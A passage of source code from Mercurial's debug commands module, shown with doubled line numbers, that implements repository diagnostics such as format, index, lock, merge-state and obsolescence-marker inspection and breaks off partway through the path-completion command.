879 879 '''parse and apply a fileset specification'''
880 880 ctx = scmutil.revsingle(repo, opts.get(r'rev'), None)
881 881 if ui.verbose:
882 882 tree = fileset.parse(expr)
883 883 ui.note(fileset.prettyformat(tree), "\n")
884 884
885 885 for f in ctx.getfileset(expr):
886 886 ui.write("%s\n" % f)
887 887
888 888 @command('debugformat',
889 889 [] + cmdutil.formatteropts,
890 890 _(''))
891 891 def debugformat(ui, repo, **opts):
892 892 """display format information about the current repository
893 893
894 894 Use --verbose to get extra information about current config value and
895 895 Mercurial default."""
896 896 opts = pycompat.byteskwargs(opts)
897 897 maxvariantlength = max(len(fv.name) for fv in upgrade.allformatvariant)
898 898 maxvariantlength = max(len('format-variant'), maxvariantlength)
899 899
900 900 def makeformatname(name):
901 901 return '%s:' + (' ' * (maxvariantlength - len(name)))
902 902
903 903 fm = ui.formatter('debugformat', opts)
904 904 if fm.isplain():
905 905 def formatvalue(value):
906 906 if util.safehasattr(value, 'startswith'):
907 907 return value
908 908 if value:
909 909 return 'yes'
910 910 else:
911 911 return 'no'
912 912 else:
913 913 formatvalue = pycompat.identity
914 914
915 915 fm.plain('format-variant')
916 916 fm.plain(' ' * (maxvariantlength - len('format-variant')))
917 917 fm.plain(' repo')
918 918 if ui.verbose:
919 919 fm.plain(' config default')
920 920 fm.plain('\n')
921 921 for fv in upgrade.allformatvariant:
922 922 fm.startitem()
923 923 repovalue = fv.fromrepo(repo)
924 924 configvalue = fv.fromconfig(repo)
925 925
926 926 if repovalue != configvalue:
927 927 namelabel = 'formatvariant.name.mismatchconfig'
928 928 repolabel = 'formatvariant.repo.mismatchconfig'
929 929 elif repovalue != fv.default:
930 930 namelabel = 'formatvariant.name.mismatchdefault'
931 931 repolabel = 'formatvariant.repo.mismatchdefault'
932 932 else:
933 933 namelabel = 'formatvariant.name.uptodate'
934 934 repolabel = 'formatvariant.repo.uptodate'
935 935
936 936 fm.write('name', makeformatname(fv.name), fv.name,
937 937 label=namelabel)
938 938 fm.write('repo', ' %3s', formatvalue(repovalue),
939 939 label=repolabel)
940 940 if fv.default != configvalue:
941 941 configlabel = 'formatvariant.config.special'
942 942 else:
943 943 configlabel = 'formatvariant.config.default'
944 944 fm.condwrite(ui.verbose, 'config', ' %6s', formatvalue(configvalue),
945 945 label=configlabel)
946 946 fm.condwrite(ui.verbose, 'default', ' %7s', formatvalue(fv.default),
947 947 label='formatvariant.default')
948 948 fm.plain('\n')
949 949 fm.end()
950 950
951 951 @command('debugfsinfo', [], _('[PATH]'), norepo=True)
952 952 def debugfsinfo(ui, path="."):
953 953 """show information detected about current filesystem"""
954 954 ui.write(('path: %s\n') % path)
955 955 ui.write(('mounted on: %s\n') % (util.getfsmountpoint(path) or '(unknown)'))
956 956 ui.write(('exec: %s\n') % (util.checkexec(path) and 'yes' or 'no'))
957 957 ui.write(('fstype: %s\n') % (util.getfstype(path) or '(unknown)'))
958 958 ui.write(('symlink: %s\n') % (util.checklink(path) and 'yes' or 'no'))
959 959 ui.write(('hardlink: %s\n') % (util.checknlink(path) and 'yes' or 'no'))
960 960 casesensitive = '(unknown)'
961 961 try:
962 962 with tempfile.NamedTemporaryFile(prefix='.debugfsinfo', dir=path) as f:
963 963 casesensitive = util.fscasesensitive(f.name) and 'yes' or 'no'
964 964 except OSError:
965 965 pass
966 966 ui.write(('case-sensitive: %s\n') % casesensitive)
967 967
968 968 @command('debuggetbundle',
969 969 [('H', 'head', [], _('id of head node'), _('ID')),
970 970 ('C', 'common', [], _('id of common node'), _('ID')),
971 971 ('t', 'type', 'bzip2', _('bundle compression type to use'), _('TYPE'))],
972 972 _('REPO FILE [-H|-C ID]...'),
973 973 norepo=True)
974 974 def debuggetbundle(ui, repopath, bundlepath, head=None, common=None, **opts):
975 975 """retrieves a bundle from a repo
976 976
977 977 Every ID must be a full-length hex node id string. Saves the bundle to the
978 978 given file.
979 979 """
980 980 opts = pycompat.byteskwargs(opts)
981 981 repo = hg.peer(ui, opts, repopath)
982 982 if not repo.capable('getbundle'):
983 983 raise error.Abort("getbundle() not supported by target repository")
984 984 args = {}
985 985 if common:
986 986 args[r'common'] = [bin(s) for s in common]
987 987 if head:
988 988 args[r'heads'] = [bin(s) for s in head]
989 989 # TODO: get desired bundlecaps from command line.
990 990 args[r'bundlecaps'] = None
991 991 bundle = repo.getbundle('debug', **args)
992 992
993 993 bundletype = opts.get('type', 'bzip2').lower()
994 994 btypes = {'none': 'HG10UN',
995 995 'bzip2': 'HG10BZ',
996 996 'gzip': 'HG10GZ',
997 997 'bundle2': 'HG20'}
998 998 bundletype = btypes.get(bundletype)
999 999 if bundletype not in bundle2.bundletypes:
1000 1000 raise error.Abort(_('unknown bundle type specified with --type'))
1001 1001 bundle2.writebundle(ui, bundle, bundlepath, bundletype)
1002 1002
1003 1003 @command('debugignore', [], '[FILE]')
1004 1004 def debugignore(ui, repo, *files, **opts):
1005 1005 """display the combined ignore pattern and information about ignored files
1006 1006
1007 1007 With no argument display the combined ignore pattern.
1008 1008
1009 1009 Given space separated file names, shows if the given file is ignored and
1010 1010 if so, show the ignore rule (file and line number) that matched it.
1011 1011 """
1012 1012 ignore = repo.dirstate._ignore
1013 1013 if not files:
1014 1014 # Show all the patterns
1015 1015 ui.write("%s\n" % pycompat.byterepr(ignore))
1016 1016 else:
1017 1017 m = scmutil.match(repo[None], pats=files)
1018 1018 for f in m.files():
1019 1019 nf = util.normpath(f)
1020 1020 ignored = None
1021 1021 ignoredata = None
1022 1022 if nf != '.':
1023 1023 if ignore(nf):
1024 1024 ignored = nf
1025 1025 ignoredata = repo.dirstate._ignorefileandline(nf)
1026 1026 else:
1027 1027 for p in util.finddirs(nf):
1028 1028 if ignore(p):
1029 1029 ignored = p
1030 1030 ignoredata = repo.dirstate._ignorefileandline(p)
1031 1031 break
1032 1032 if ignored:
1033 1033 if ignored == nf:
1034 1034 ui.write(_("%s is ignored\n") % m.uipath(f))
1035 1035 else:
1036 1036 ui.write(_("%s is ignored because of "
1037 1037 "containing folder %s\n")
1038 1038 % (m.uipath(f), ignored))
1039 1039 ignorefile, lineno, line = ignoredata
1040 1040 ui.write(_("(ignore rule in %s, line %d: '%s')\n")
1041 1041 % (ignorefile, lineno, line))
1042 1042 else:
1043 1043 ui.write(_("%s is not ignored\n") % m.uipath(f))
1044 1044
1045 1045 @command('debugindex', cmdutil.debugrevlogopts +
1046 1046 [('f', 'format', 0, _('revlog format'), _('FORMAT'))],
1047 1047 _('[-f FORMAT] -c|-m|FILE'),
1048 1048 optionalrepo=True)
1049 1049 def debugindex(ui, repo, file_=None, **opts):
1050 1050 """dump the contents of an index file"""
1051 1051 opts = pycompat.byteskwargs(opts)
1052 1052 r = cmdutil.openrevlog(repo, 'debugindex', file_, opts)
1053 1053 format = opts.get('format', 0)
1054 1054 if format not in (0, 1):
1055 1055 raise error.Abort(_("unknown format %d") % format)
1056 1056
1057 1057 generaldelta = r.version & revlog.FLAG_GENERALDELTA
1058 1058 if generaldelta:
1059 1059 basehdr = ' delta'
1060 1060 else:
1061 1061 basehdr = ' base'
1062 1062
1063 1063 if ui.debugflag:
1064 1064 shortfn = hex
1065 1065 else:
1066 1066 shortfn = short
1067 1067
1068 1068 # There might not be anything in r, so have a sane default
1069 1069 idlen = 12
1070 1070 for i in r:
1071 1071 idlen = len(shortfn(r.node(i)))
1072 1072 break
1073 1073
1074 1074 if format == 0:
1075 1075 ui.write((" rev offset length " + basehdr + " linkrev"
1076 1076 " %s %s p2\n") % ("nodeid".ljust(idlen), "p1".ljust(idlen)))
1077 1077 elif format == 1:
1078 1078 ui.write((" rev flag offset length"
1079 1079 " size " + basehdr + " link p1 p2"
1080 1080 " %s\n") % "nodeid".rjust(idlen))
1081 1081
1082 1082 for i in r:
1083 1083 node = r.node(i)
1084 1084 if generaldelta:
1085 1085 base = r.deltaparent(i)
1086 1086 else:
1087 1087 base = r.chainbase(i)
1088 1088 if format == 0:
1089 1089 try:
1090 1090 pp = r.parents(node)
1091 1091 except Exception:
1092 1092 pp = [nullid, nullid]
1093 1093 ui.write("% 6d % 9d % 7d % 6d % 7d %s %s %s\n" % (
1094 1094 i, r.start(i), r.length(i), base, r.linkrev(i),
1095 1095 shortfn(node), shortfn(pp[0]), shortfn(pp[1])))
1096 1096 elif format == 1:
1097 1097 pr = r.parentrevs(i)
1098 1098 ui.write("% 6d %04x % 8d % 8d % 8d % 6d % 6d % 6d % 6d %s\n" % (
1099 1099 i, r.flags(i), r.start(i), r.length(i), r.rawsize(i),
1100 1100 base, r.linkrev(i), pr[0], pr[1], shortfn(node)))
1101 1101
1102 1102 @command('debugindexdot', cmdutil.debugrevlogopts,
1103 1103 _('-c|-m|FILE'), optionalrepo=True)
1104 1104 def debugindexdot(ui, repo, file_=None, **opts):
1105 1105 """dump an index DAG as a graphviz dot file"""
1106 1106 opts = pycompat.byteskwargs(opts)
1107 1107 r = cmdutil.openrevlog(repo, 'debugindexdot', file_, opts)
1108 1108 ui.write(("digraph G {\n"))
1109 1109 for i in r:
1110 1110 node = r.node(i)
1111 1111 pp = r.parents(node)
1112 1112 ui.write("\t%d -> %d\n" % (r.rev(pp[0]), i))
1113 1113 if pp[1] != nullid:
1114 1114 ui.write("\t%d -> %d\n" % (r.rev(pp[1]), i))
1115 1115 ui.write("}\n")
1116 1116
1117 1117 @command('debuginstall', [] + cmdutil.formatteropts, '', norepo=True)
1118 1118 def debuginstall(ui, **opts):
1119 1119 '''test Mercurial installation
1120 1120
1121 1121 Returns 0 on success.
1122 1122 '''
1123 1123 opts = pycompat.byteskwargs(opts)
1124 1124
1125 1125 def writetemp(contents):
1126 1126 (fd, name) = tempfile.mkstemp(prefix="hg-debuginstall-")
1127 1127 f = os.fdopen(fd, r"wb")
1128 1128 f.write(contents)
1129 1129 f.close()
1130 1130 return name
1131 1131
1132 1132 problems = 0
1133 1133
1134 1134 fm = ui.formatter('debuginstall', opts)
1135 1135 fm.startitem()
1136 1136
1137 1137 # encoding
1138 1138 fm.write('encoding', _("checking encoding (%s)...\n"), encoding.encoding)
1139 1139 err = None
1140 1140 try:
1141 1141 codecs.lookup(pycompat.sysstr(encoding.encoding))
1142 1142 except LookupError as inst:
1143 1143 err = util.forcebytestr(inst)
1144 1144 problems += 1
1145 1145 fm.condwrite(err, 'encodingerror', _(" %s\n"
1146 1146 " (check that your locale is properly set)\n"), err)
1147 1147
1148 1148 # Python
1149 1149 fm.write('pythonexe', _("checking Python executable (%s)\n"),
1150 1150 pycompat.sysexecutable)
1151 1151 fm.write('pythonver', _("checking Python version (%s)\n"),
1152 1152 ("%d.%d.%d" % sys.version_info[:3]))
1153 1153 fm.write('pythonlib', _("checking Python lib (%s)...\n"),
1154 1154 os.path.dirname(pycompat.fsencode(os.__file__)))
1155 1155
1156 1156 security = set(sslutil.supportedprotocols)
1157 1157 if sslutil.hassni:
1158 1158 security.add('sni')
1159 1159
1160 1160 fm.write('pythonsecurity', _("checking Python security support (%s)\n"),
1161 1161 fm.formatlist(sorted(security), name='protocol',
1162 1162 fmt='%s', sep=','))
1163 1163
1164 1164 # These are warnings, not errors. So don't increment problem count. This
1165 1165 # may change in the future.
1166 1166 if 'tls1.2' not in security:
1167 1167 fm.plain(_(' TLS 1.2 not supported by Python install; '
1168 1168 'network connections lack modern security\n'))
1169 1169 if 'sni' not in security:
1170 1170 fm.plain(_(' SNI not supported by Python install; may have '
1171 1171 'connectivity issues with some servers\n'))
1172 1172
1173 1173 # TODO print CA cert info
1174 1174
1175 1175 # hg version
1176 1176 hgver = util.version()
1177 1177 fm.write('hgver', _("checking Mercurial version (%s)\n"),
1178 1178 hgver.split('+')[0])
1179 1179 fm.write('hgverextra', _("checking Mercurial custom build (%s)\n"),
1180 1180 '+'.join(hgver.split('+')[1:]))
1181 1181
1182 1182 # compiled modules
1183 1183 fm.write('hgmodulepolicy', _("checking module policy (%s)\n"),
1184 1184 policy.policy)
1185 1185 fm.write('hgmodules', _("checking installed modules (%s)...\n"),
1186 1186 os.path.dirname(pycompat.fsencode(__file__)))
1187 1187
1188 1188 if policy.policy in ('c', 'allow'):
1189 1189 err = None
1190 1190 try:
1191 1191 from .cext import (
1192 1192 base85,
1193 1193 bdiff,
1194 1194 mpatch,
1195 1195 osutil,
1196 1196 )
1197 1197 dir(bdiff), dir(mpatch), dir(base85), dir(osutil) # quiet pyflakes
1198 1198 except Exception as inst:
1199 1199 err = util.forcebytestr(inst)
1200 1200 problems += 1
1201 1201 fm.condwrite(err, 'extensionserror', " %s\n", err)
1202 1202
1203 1203 compengines = util.compengines._engines.values()
1204 1204 fm.write('compengines', _('checking registered compression engines (%s)\n'),
1205 1205 fm.formatlist(sorted(e.name() for e in compengines),
1206 1206 name='compengine', fmt='%s', sep=', '))
1207 1207 fm.write('compenginesavail', _('checking available compression engines '
1208 1208 '(%s)\n'),
1209 1209 fm.formatlist(sorted(e.name() for e in compengines
1210 1210 if e.available()),
1211 1211 name='compengine', fmt='%s', sep=', '))
1212 1212 wirecompengines = util.compengines.supportedwireengines(util.SERVERROLE)
1213 1213 fm.write('compenginesserver', _('checking available compression engines '
1214 1214 'for wire protocol (%s)\n'),
1215 1215 fm.formatlist([e.name() for e in wirecompengines
1216 1216 if e.wireprotosupport()],
1217 1217 name='compengine', fmt='%s', sep=', '))
1218 1218 re2 = 'missing'
1219 1219 if util._re2:
1220 1220 re2 = 'available'
1221 1221 fm.plain(_('checking "re2" regexp engine (%s)\n') % re2)
1222 1222 fm.data(re2=bool(util._re2))
1223 1223
1224 1224 # templates
1225 1225 p = templater.templatepaths()
1226 1226 fm.write('templatedirs', 'checking templates (%s)...\n', ' '.join(p))
1227 1227 fm.condwrite(not p, '', _(" no template directories found\n"))
1228 1228 if p:
1229 1229 m = templater.templatepath("map-cmdline.default")
1230 1230 if m:
1231 1231 # template found, check if it is working
1232 1232 err = None
1233 1233 try:
1234 1234 templater.templater.frommapfile(m)
1235 1235 except Exception as inst:
1236 1236 err = util.forcebytestr(inst)
1237 1237 p = None
1238 1238 fm.condwrite(err, 'defaulttemplateerror', " %s\n", err)
1239 1239 else:
1240 1240 p = None
1241 1241 fm.condwrite(p, 'defaulttemplate',
1242 1242 _("checking default template (%s)\n"), m)
1243 1243 fm.condwrite(not m, 'defaulttemplatenotfound',
1244 1244 _(" template '%s' not found\n"), "default")
1245 1245 if not p:
1246 1246 problems += 1
1247 1247 fm.condwrite(not p, '',
1248 1248 _(" (templates seem to have been installed incorrectly)\n"))
1249 1249
1250 1250 # editor
1251 1251 editor = ui.geteditor()
1252 1252 editor = util.expandpath(editor)
1253 1253 editorbin = util.shellsplit(editor)[0]
1254 1254 fm.write('editor', _("checking commit editor... (%s)\n"), editorbin)
1255 1255 cmdpath = util.findexe(editorbin)
1256 1256 fm.condwrite(not cmdpath and editor == 'vi', 'vinotfound',
1257 1257 _(" No commit editor set and can't find %s in PATH\n"
1258 1258 " (specify a commit editor in your configuration"
1259 1259 " file)\n"), not cmdpath and editor == 'vi' and editorbin)
1260 1260 fm.condwrite(not cmdpath and editor != 'vi', 'editornotfound',
1261 1261 _(" Can't find editor '%s' in PATH\n"
1262 1262 " (specify a commit editor in your configuration"
1263 1263 " file)\n"), not cmdpath and editorbin)
1264 1264 if not cmdpath and editor != 'vi':
1265 1265 problems += 1
1266 1266
1267 1267 # check username
1268 1268 username = None
1269 1269 err = None
1270 1270 try:
1271 1271 username = ui.username()
1272 1272 except error.Abort as e:
1273 1273 err = util.forcebytestr(e)
1274 1274 problems += 1
1275 1275
1276 1276 fm.condwrite(username, 'username', _("checking username (%s)\n"), username)
1277 1277 fm.condwrite(err, 'usernameerror', _("checking username...\n %s\n"
1278 1278 " (specify a username in your configuration file)\n"), err)
1279 1279
1280 1280 fm.condwrite(not problems, '',
1281 1281 _("no problems detected\n"))
1282 1282 if not problems:
1283 1283 fm.data(problems=problems)
1284 1284 fm.condwrite(problems, 'problems',
1285 1285 _("%d problems detected,"
1286 1286 " please check your install!\n"), problems)
1287 1287 fm.end()
1288 1288
1289 1289 return problems
1290 1290
1291 1291 @command('debugknown', [], _('REPO ID...'), norepo=True)
1292 1292 def debugknown(ui, repopath, *ids, **opts):
1293 1293 """test whether node ids are known to a repo
1294 1294
1295 1295 Every ID must be a full-length hex node id string. Returns a list of 0s
1296 1296 and 1s indicating unknown/known.
1297 1297 """
1298 1298 opts = pycompat.byteskwargs(opts)
1299 1299 repo = hg.peer(ui, opts, repopath)
1300 1300 if not repo.capable('known'):
1301 1301 raise error.Abort("known() not supported by target repository")
1302 1302 flags = repo.known([bin(s) for s in ids])
1303 1303 ui.write("%s\n" % ("".join([f and "1" or "0" for f in flags])))
1304 1304
1305 1305 @command('debuglabelcomplete', [], _('LABEL...'))
1306 1306 def debuglabelcomplete(ui, repo, *args):
1307 1307 '''backwards compatibility with old bash completion scripts (DEPRECATED)'''
1308 1308 debugnamecomplete(ui, repo, *args)
1309 1309
1310 1310 @command('debuglocks',
1311 1311 [('L', 'force-lock', None, _('free the store lock (DANGEROUS)')),
1312 1312 ('W', 'force-wlock', None,
1313 1313 _('free the working state lock (DANGEROUS)')),
1314 1314 ('s', 'set-lock', None, _('set the store lock until stopped')),
1315 1315 ('S', 'set-wlock', None,
1316 1316 _('set the working state lock until stopped'))],
1317 1317 _('[OPTION]...'))
1318 1318 def debuglocks(ui, repo, **opts):
1319 1319 """show or modify state of locks
1320 1320
1321 1321 By default, this command will show which locks are held. This
1322 1322 includes the user and process holding the lock, the amount of time
1323 1323 the lock has been held, and the machine name where the process is
1324 1324 running if it's not local.
1325 1325
1326 1326 Locks protect the integrity of Mercurial's data, so should be
1327 1327 treated with care. System crashes or other interruptions may cause
1328 1328 locks to not be properly released, though Mercurial will usually
1329 1329 detect and remove such stale locks automatically.
1330 1330
1331 1331 However, detecting stale locks may not always be possible (for
1332 1332 instance, on a shared filesystem). Removing locks may also be
1333 1333 blocked by filesystem permissions.
1334 1334
1335 1335 Setting a lock will prevent other commands from changing the data.
1336 1336 The command will wait until an interruption (SIGINT, SIGTERM, ...) occurs.
1337 1337 The set locks are removed when the command exits.
1338 1338
1339 1339 Returns 0 if no locks are held.
1340 1340
1341 1341 """
1342 1342
1343 1343 if opts.get(r'force_lock'):
1344 1344 repo.svfs.unlink('lock')
1345 1345 if opts.get(r'force_wlock'):
1346 1346 repo.vfs.unlink('wlock')
1347 1347 if opts.get(r'force_lock') or opts.get(r'force_wlock'):
1348 1348 return 0
1349 1349
1350 1350 locks = []
1351 1351 try:
1352 1352 if opts.get(r'set_wlock'):
1353 1353 try:
1354 1354 locks.append(repo.wlock(False))
1355 1355 except error.LockHeld:
1356 1356 raise error.Abort(_('wlock is already held'))
1357 1357 if opts.get(r'set_lock'):
1358 1358 try:
1359 1359 locks.append(repo.lock(False))
1360 1360 except error.LockHeld:
1361 1361 raise error.Abort(_('lock is already held'))
1362 1362 if len(locks):
1363 1363 ui.promptchoice(_("ready to release the lock (y)? $$ &Yes"))
1364 1364 return 0
1365 1365 finally:
1366 1366 release(*locks)
1367 1367
1368 1368 now = time.time()
1369 1369 held = 0
1370 1370
1371 1371 def report(vfs, name, method):
1372 1372 # this causes stale locks to get reaped for more accurate reporting
1373 1373 try:
1374 1374 l = method(False)
1375 1375 except error.LockHeld:
1376 1376 l = None
1377 1377
1378 1378 if l:
1379 1379 l.release()
1380 1380 else:
1381 1381 try:
1382 1382 st = vfs.lstat(name)
1383 1383 age = now - st[stat.ST_MTIME]
1384 1384 user = util.username(st.st_uid)
1385 1385 locker = vfs.readlock(name)
1386 1386 if ":" in locker:
1387 1387 host, pid = locker.split(':')
1388 1388 if host == socket.gethostname():
1389 1389 locker = 'user %s, process %s' % (user, pid)
1390 1390 else:
1391 1391 locker = 'user %s, process %s, host %s' \
1392 1392 % (user, pid, host)
1393 1393 ui.write(("%-6s %s (%ds)\n") % (name + ":", locker, age))
1394 1394 return 1
1395 1395 except OSError as e:
1396 1396 if e.errno != errno.ENOENT:
1397 1397 raise
1398 1398
1399 1399 ui.write(("%-6s free\n") % (name + ":"))
1400 1400 return 0
1401 1401
1402 1402 held += report(repo.svfs, "lock", repo.lock)
1403 1403 held += report(repo.vfs, "wlock", repo.wlock)
1404 1404
1405 1405 return held
1406 1406
1407 1407 @command('debugmergestate', [], '')
1408 1408 def debugmergestate(ui, repo, *args):
1409 1409 """print merge state
1410 1410
1411 1411 Use --verbose to print out information about whether v1 or v2 merge state
1412 1412 was chosen."""
1413 1413 def _hashornull(h):
1414 1414 if h == nullhex:
1415 1415 return 'null'
1416 1416 else:
1417 1417 return h
1418 1418
1419 1419 def printrecords(version):
1420 1420 ui.write(('* version %d records\n') % version)
1421 1421 if version == 1:
1422 1422 records = v1records
1423 1423 else:
1424 1424 records = v2records
1425 1425
1426 1426 for rtype, record in records:
1427 1427 # pretty print some record types
1428 1428 if rtype == 'L':
1429 1429 ui.write(('local: %s\n') % record)
1430 1430 elif rtype == 'O':
1431 1431 ui.write(('other: %s\n') % record)
1432 1432 elif rtype == 'm':
1433 1433 driver, mdstate = record.split('\0', 1)
1434 1434 ui.write(('merge driver: %s (state "%s")\n')
1435 1435 % (driver, mdstate))
1436 1436 elif rtype in 'FDC':
1437 1437 r = record.split('\0')
1438 1438 f, state, hash, lfile, afile, anode, ofile = r[0:7]
1439 1439 if version == 1:
1440 1440 onode = 'not stored in v1 format'
1441 1441 flags = r[7]
1442 1442 else:
1443 1443 onode, flags = r[7:9]
1444 1444 ui.write(('file: %s (record type "%s", state "%s", hash %s)\n')
1445 1445 % (f, rtype, state, _hashornull(hash)))
1446 1446 ui.write((' local path: %s (flags "%s")\n') % (lfile, flags))
1447 1447 ui.write((' ancestor path: %s (node %s)\n')
1448 1448 % (afile, _hashornull(anode)))
1449 1449 ui.write((' other path: %s (node %s)\n')
1450 1450 % (ofile, _hashornull(onode)))
1451 1451 elif rtype == 'f':
1452 1452 filename, rawextras = record.split('\0', 1)
1453 1453 extras = rawextras.split('\0')
1454 1454 i = 0
1455 1455 extrastrings = []
1456 1456 while i < len(extras):
1457 1457 extrastrings.append('%s = %s' % (extras[i], extras[i + 1]))
1458 1458 i += 2
1459 1459
1460 1460 ui.write(('file extras: %s (%s)\n')
1461 1461 % (filename, ', '.join(extrastrings)))
1462 1462 elif rtype == 'l':
1463 1463 labels = record.split('\0', 2)
1464 1464 labels = [l for l in labels if len(l) > 0]
1465 1465 ui.write(('labels:\n'))
1466 1466 ui.write((' local: %s\n' % labels[0]))
1467 1467 ui.write((' other: %s\n' % labels[1]))
1468 1468 if len(labels) > 2:
1469 1469 ui.write((' base: %s\n' % labels[2]))
1470 1470 else:
1471 1471 ui.write(('unrecognized entry: %s\t%s\n')
1472 1472 % (rtype, record.replace('\0', '\t')))
1473 1473
1474 1474 # Avoid mergestate.read() since it may raise an exception for unsupported
1475 1475 # merge state records. We shouldn't be doing this, but this is OK since this
1476 1476 # command is pretty low-level.
1477 1477 ms = mergemod.mergestate(repo)
1478 1478
1479 1479 # sort so that reasonable information is on top
1480 1480 v1records = ms._readrecordsv1()
1481 1481 v2records = ms._readrecordsv2()
1482 1482 order = 'LOml'
1483 1483 def key(r):
1484 1484 idx = order.find(r[0])
1485 1485 if idx == -1:
1486 1486 return (1, r[1])
1487 1487 else:
1488 1488 return (0, idx)
1489 1489 v1records.sort(key=key)
1490 1490 v2records.sort(key=key)
1491 1491
1492 1492 if not v1records and not v2records:
1493 1493 ui.write(('no merge state found\n'))
1494 1494 elif not v2records:
1495 1495 ui.note(('no version 2 merge state\n'))
1496 1496 printrecords(1)
1497 1497 elif ms._v1v2match(v1records, v2records):
1498 1498 ui.note(('v1 and v2 states match: using v2\n'))
1499 1499 printrecords(2)
1500 1500 else:
1501 1501 ui.note(('v1 and v2 states mismatch: using v1\n'))
1502 1502 printrecords(1)
1503 1503 if ui.verbose:
1504 1504 printrecords(2)
1505 1505
1506 1506 @command('debugnamecomplete', [], _('NAME...'))
1507 1507 def debugnamecomplete(ui, repo, *args):
1508 1508 '''complete "names" - tags, open branch names, bookmark names'''
1509 1509
1510 1510 names = set()
1511 1511 # since we previously only listed open branches, we will handle that
1512 1512 # specially (after this for loop)
1513 1513 for name, ns in repo.names.iteritems():
1514 1514 if name != 'branches':
1515 1515 names.update(ns.listnames(repo))
1516 1516 names.update(tag for (tag, heads, tip, closed)
1517 1517 in repo.branchmap().iterbranches() if not closed)
1518 1518 completions = set()
1519 1519 if not args:
1520 1520 args = ['']
1521 1521 for a in args:
1522 1522 completions.update(n for n in names if n.startswith(a))
1523 1523 ui.write('\n'.join(sorted(completions)))
1524 1524 ui.write('\n')
1525 1525
1526 1526 @command('debugobsolete',
1527 1527 [('', 'flags', 0, _('markers flag')),
1528 1528 ('', 'record-parents', False,
1529 1529 _('record parent information for the precursor')),
1530 1530 ('r', 'rev', [], _('display markers relevant to REV')),
1531 1531 ('', 'exclusive', False, _('restrict display to markers only '
1532 1532 'relevant to REV')),
1533 1533 ('', 'index', False, _('display index of the marker')),
1534 1534 ('', 'delete', [], _('delete markers specified by indices')),
1535 1535 ] + cmdutil.commitopts2 + cmdutil.formatteropts,
1536 1536 _('[OBSOLETED [REPLACEMENT ...]]'))
1537 1537 def debugobsolete(ui, repo, precursor=None, *successors, **opts):
1538 1538 """create arbitrary obsolete marker
1539 1539
1540 1540 With no arguments, displays the list of obsolescence markers."""
1541 1541
1542 1542 opts = pycompat.byteskwargs(opts)
1543 1543
1544 1544 def parsenodeid(s):
1545 1545 try:
1546 1546 # We do not use revsingle/revrange functions here to accept
1547 1547 # arbitrary node identifiers, possibly not present in the
1548 1548 # local repository.
1549 1549 n = bin(s)
1550 1550 if len(n) != len(nullid):
1551 1551 raise TypeError()
1552 1552 return n
1553 1553 except TypeError:
1554 1554 raise error.Abort('changeset references must be full hexadecimal '
1555 1555 'node identifiers')
1556 1556
1557 1557 if opts.get('delete'):
1558 1558 indices = []
1559 1559 for v in opts.get('delete'):
1560 1560 try:
1561 1561 indices.append(int(v))
1562 1562 except ValueError:
1563 1563 raise error.Abort(_('invalid index value: %r') % v,
1564 1564 hint=_('use integers for indices'))
1565 1565
1566 1566 if repo.currenttransaction():
1567 1567 raise error.Abort(_('cannot delete obsmarkers in the middle '
1568 1568 'of transaction.'))
1569 1569
1570 1570 with repo.lock():
1571 1571 n = repair.deleteobsmarkers(repo.obsstore, indices)
1572 1572 ui.write(_('deleted %i obsolescence markers\n') % n)
1573 1573
1574 1574 return
1575 1575
1576 1576 if precursor is not None:
1577 1577 if opts['rev']:
1578 1578 raise error.Abort('cannot select revision when creating marker')
1579 1579 metadata = {}
1580 1580 metadata['user'] = opts['user'] or ui.username()
1581 1581 succs = tuple(parsenodeid(succ) for succ in successors)
1582 1582 l = repo.lock()
1583 1583 try:
1584 1584 tr = repo.transaction('debugobsolete')
1585 1585 try:
1586 1586 date = opts.get('date')
1587 1587 if date:
1588 1588 date = dateutil.parsedate(date)
1589 1589 else:
1590 1590 date = None
1591 1591 prec = parsenodeid(precursor)
1592 1592 parents = None
1593 1593 if opts['record_parents']:
1594 1594 if prec not in repo.unfiltered():
1595 1595 raise error.Abort('cannot used --record-parents on '
1596 1596 'unknown changesets')
1597 1597 parents = repo.unfiltered()[prec].parents()
1598 1598 parents = tuple(p.node() for p in parents)
1599 1599 repo.obsstore.create(tr, prec, succs, opts['flags'],
1600 1600 parents=parents, date=date,
1601 1601 metadata=metadata, ui=ui)
1602 1602 tr.close()
1603 1603 except ValueError as exc:
1604 1604 raise error.Abort(_('bad obsmarker input: %s') %
1605 1605 pycompat.bytestr(exc))
1606 1606 finally:
1607 1607 tr.release()
1608 1608 finally:
1609 1609 l.release()
1610 1610 else:
1611 1611 if opts['rev']:
1612 1612 revs = scmutil.revrange(repo, opts['rev'])
1613 1613 nodes = [repo[r].node() for r in revs]
1614 1614 markers = list(obsutil.getmarkers(repo, nodes=nodes,
1615 1615 exclusive=opts['exclusive']))
1616 1616 markers.sort(key=lambda x: x._data)
1617 1617 else:
1618 1618 markers = obsutil.getmarkers(repo)
1619 1619
1620 1620 markerstoiter = markers
1621 1621 isrelevant = lambda m: True
1622 1622 if opts.get('rev') and opts.get('index'):
1623 1623 markerstoiter = obsutil.getmarkers(repo)
1624 1624 markerset = set(markers)
1625 1625 isrelevant = lambda m: m in markerset
1626 1626
1627 1627 fm = ui.formatter('debugobsolete', opts)
1628 1628 for i, m in enumerate(markerstoiter):
1629 1629 if not isrelevant(m):
1630 1630 # marker can be irrelevant when we're iterating over a set
1631 1631 # of markers (markerstoiter) which is bigger than the set
1632 1632 # of markers we want to display (markers)
1633 1633 # this can happen if both --index and --rev options are
1634 1634 # provided and thus we need to iterate over all of the markers
1635 1635 # to get the correct indices, but only display the ones that
1636 1636 # are relevant to --rev value
1637 1637 continue
1638 1638 fm.startitem()
1639 1639 ind = i if opts.get('index') else None
1640 1640 cmdutil.showmarker(fm, m, index=ind)
1641 1641 fm.end()
1642 1642
1643 1643 @command('debugpathcomplete',
1644 1644 [('f', 'full', None, _('complete an entire path')),
1645 1645 ('n', 'normal', None, _('show only normal files')),
1646 1646 ('a', 'added', None, _('show only added files')),
1647 1647 ('r', 'removed', None, _('show only removed files'))],
1648 1648 _('FILESPEC...'))
1649 1649 def debugpathcomplete(ui, repo, *specs, **opts):
1650 1650 '''complete part or all of a tracked path
1651 1651
1652 1652 This command supports shells that offer path name completion. It
1653 1653 currently completes only files already known to the dirstate.
1654 1654
1655 1655 Completion extends only to the next path segment unless
1656 1656 --full is specified, in which case entire paths are used.'''
1657 1657
1658 1658 def complete(path, acceptable):
1659 1659 dirstate = repo.dirstate
1660 1660 spec = os.path.normpath(os.path.join(pycompat.getcwd(), path))
1661 1661 rootdir = repo.root + pycompat.ossep
